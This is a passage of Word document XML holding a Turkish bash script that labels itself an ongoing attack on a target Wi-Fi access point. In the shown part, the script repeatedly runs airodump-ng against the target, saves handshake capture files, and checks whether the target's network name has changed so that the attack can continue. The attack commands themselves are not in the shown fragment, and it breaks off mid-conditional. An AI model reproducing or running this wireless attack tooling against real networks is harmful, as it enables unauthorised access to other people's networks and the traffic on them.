        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBBB0D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D38383" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="146935B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233EBADF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3893CD7C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="193EEB09" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "Saldırı devam ediyor ..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB7BB5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "      Şu anki ağ $Host_SSID                              "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22559484" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">echo "      1) Başka bir ağ seçin" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F438D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "      2) Çıkış"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583F4985" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "     "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF4503B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n '      #&gt; '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6A3E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA9ECB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AD5B1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t># Eğer saldırılan modem yayın keserse bizde keseriz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994E28F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">a=0                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC45A25" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3AC3213F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>kesilmesayisi=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF45A0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="127EFFDE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>############################################################################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A9B20" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="568DEC4C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>while true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAEF900" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5C934339" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>[ $kesilmesayisi -lt 999 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1886D3D3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="077911A2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA62E5F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="644DC707" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>a=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D9538D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2A67134D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>###########################################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5C4AF6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="22B49EFA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>while true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0643ADF9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6D75D211" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>[ $a -lt 2 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C08C13F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="56EA7D74" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDBB6BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="13FE4435" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1C8B6D1D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>##########################################################################################################modem isim değiştirdimi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5AC6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2514C8F6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="296E4668" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>rm -rf $DUMP_PATH/elsikisma*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FD0BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="564784AD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>xterm -e airodump-ng -w $DUMP_PATH/elsikisma -a $WIFI_MONITOR2 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B9CC86" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="42E7E4D4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>sleep 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542830A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="73A9F14B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>killall airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599AC234" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="21193DC1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>c=" "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062C810" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="48A1FB6F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>c=`grep "$Host_MAC" $DUMP_PATH/elsikisma-01.csv | awk -F',' '{print $14}'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937A134" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="362FED22" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "$c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8EF64" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="56F4B874" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>r=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05550DEA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum5=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B038055" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum4=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F0ACE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum3=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E5715" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum2=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF76BB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A9CF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="45341F3F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>for haci in ${c[@]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F8F39" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="334667A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F036BE1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="314E5408" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>r=$(($r+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA80B6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="39289CBC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if [ "$r" = "1" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6611B13C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4FC93BF0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D4AAA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F64BD9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>durum=$haci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C8B9D8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6C8E709A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$r" = "2" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F82BBAF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4566E63D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179B9ECF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="48282D36" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum2=$haci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B4B6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="71699A7E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$r" = "3" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B58C450" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="17702AAD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521DAD5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3ED4E8C2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum3=$haci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F229FB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4D412AF2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$r" = "4" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819588F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5F674D33" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190982E8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1CEFCEE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum4=$haci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E15ED7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7F003FA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif [ "$r" = "5" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47972344" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0C30BEB3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45108815" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="26416A2B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>durum5=$haci</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3692B39C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="35014628" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED483F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="05F958F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D647BB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3C8AA886" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="2E70037C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if  [ "$durum" = "$Host_SSID" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42679E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="008DDB63" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D262746" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1BBD9F1F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "SEÇTİĞİN AĞ ADI BU MAC'A KAYITLI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E1C69" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6AE4D22A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="675F9648" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif  [ "$durum2" = "$Host_SSID" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59154044" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1F4F5110" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E59CEB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="43C1AF80" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "SEÇTİĞİN AĞ ADI BU MAC'A KAYITLI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787689F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="76974847" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BCC8B3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif  [ "$durum3" = "$Host_SSID" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C4D12" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4AD5A7C5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019210B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5B977E97" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "SEÇTİĞİN AĞ ADI BU MAC'A KAYITLI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE03F58" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7EEB0C20" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1A3D1CD1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif  [ "$durum4" = "$Host_SSID" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358734B3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1EFD8867" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6694EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="1D6C7389" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "SEÇTİĞİN AĞ ADI BU MAC'A KAYITLI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64991906" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6061D53E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="243E921A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>elif  [ "$durum5" = "$Host_SSID" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F77BC7A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7F863D4D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEAC0E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="57F69F80" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       echo "SEÇTİĞİN AĞ ADI BU MAC'A KAYITLI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B51E5F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF0C5D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA465F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="552A6448" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5655F9B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3B59E056" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if  [ "$durum" = "" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02000A94" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="56A2803E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331EB85F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93E9EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       if  [ "$durum2" = "" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11822C00" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="49DEBBFD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">       then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DEB766" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">                   if  [ "$durum3" = "" ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E7966" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
